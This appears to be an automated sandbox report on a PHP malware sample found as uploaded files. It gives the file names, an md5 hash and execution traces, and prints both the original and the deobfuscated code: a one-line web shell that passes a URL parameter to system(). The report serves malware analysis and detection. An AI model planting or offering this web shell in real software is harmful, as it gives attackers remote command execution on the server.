PHP Malware Analysis
00000000ax.php, edo.php5
md5: 36d459ba97aa24e53dab7e0d03ffddbc
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original)
Deobfuscated PHP code
<?php
system($_GET["cmd"]);Execution traces
data/traces/36d459ba97aa24e53dab7e0d03ffddbc_trace-1676246904.2347.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:08:50.132524]
1 0 1 0.000169 393528
1 3 0 0.000213 393920 {main} 1 /var/www/html/uploads/00000000ax.php 0 0
2 4 0 0.000247 393920 system 0 /var/www/html/uploads/00000000ax.php 1 1 NULL
2 4 1 0.000271 393952
2 4 R FALSE
1 3 1 0.000285 393920
0.000308 314240
TRACE END [2023-02-12 22:08:50.132698]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:04:41.826324]
1 0 1 0.000163 393512
1 3 0 0.000208 393896 {main} 1 /var/www/html/uploads/edo.php5 0 0
2 4 0 0.000243 393896 system 0 /var/www/html/uploads/edo.php5 1 1 NULL
2 4 1 0.000271 393928
2 4 R FALSE
1 3 1 0.000286 393896
0.000309 314224
TRACE END [2023-02-13 02:04:41.826499]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php system($_GET["cmd"]);?>